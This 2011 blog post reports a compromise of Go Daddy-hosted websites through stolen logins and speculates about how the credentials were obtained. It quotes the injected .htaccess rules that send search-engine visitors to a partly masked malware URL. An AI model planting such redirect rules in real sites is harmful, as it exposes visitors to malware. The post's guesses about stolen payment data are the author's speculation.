Web sites hosted by Go Daddy hacked and rerouted to malware sites

Sep 18 2011 / By

If you have a Go Daddy account, I suggest you change your passwords immediately!  Go Daddy has admitted that at least 445 hosted web sites have had code inserted that hijack the site by redirecting it to other sites that have malware installed.

Go Daddy Danica Web sites hosted by Go Daddy hacked and rerouted to malware sitesYes, that comes to just 0.0089% of all their hosted sites (around 5 million) so you would think this would not reach the news.  But it did make the news.

Go Daddy claims that the perpetrator(s) obtained usernames and passwords of Go Daddy clients, logged into the web sites and posted some code to redirect the sites to a really bad site.  Here is the code posted in one of the files for the web site:

ReWriteEngine On

ReWriteOptions inherit

RewriteCond %{HTTP_REFERRER} . *aswk.com.*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . *google.*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . *bing.com*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . *live.com*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . *aol.com*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . *altavista.com*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . *excite.com*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . *search.yahoo*$ [NC, OR]

RewriteCond %{HTTP_REFERRER} . http://sok*********.com/in.php?g-916 [R, L] (I changed the URL of the malware site.)

Go Daddy’s Chief Information Security Officer Todd Redfoot said “We are still investigating the issue, but so far our security team is confirming this was not an infrastructure breakdown and should not impact additional customers.  We quickly removed the malicious code and went to work to assist each of our customers to address the issue.”

A key phrase in Todd’s statement is “should not impact additional customers.”  I could be wrong, but this statement says to me that they are not confident that they found all the infected sites and more Go Daddy customers could be infected.

Todd also said “The accounts were accessed by using the account holder’s username and password.”  That tells all of us that whoever breached these accounts also has the credit card/bank information of all financial institutions attached to each customer account.

Where did they get the username/password combinations?  Was it a phishing email, a keystroke logger or a hack on Go Daddy’s customer database?  Go Daddy admits they have no idea how the account information was obtained.

Another question I would have to ask is did the hacker(s) modify web sites of all the accounts they had access to.  It is highly possible they gathered usernames and passwords of a lot more accounts and did not access them yet.  They could have also logged in, retrieved the financial information and left without anyone noticing.

I think it is time to change my Go Daddy password and cancel all the credit cards I have used to pay a Go Daddy bill.  I suggest you also take precautionary measures.

I wonder if Danika changed her password yet.

Leave a Facebook comment

Leave a Reply on Our Site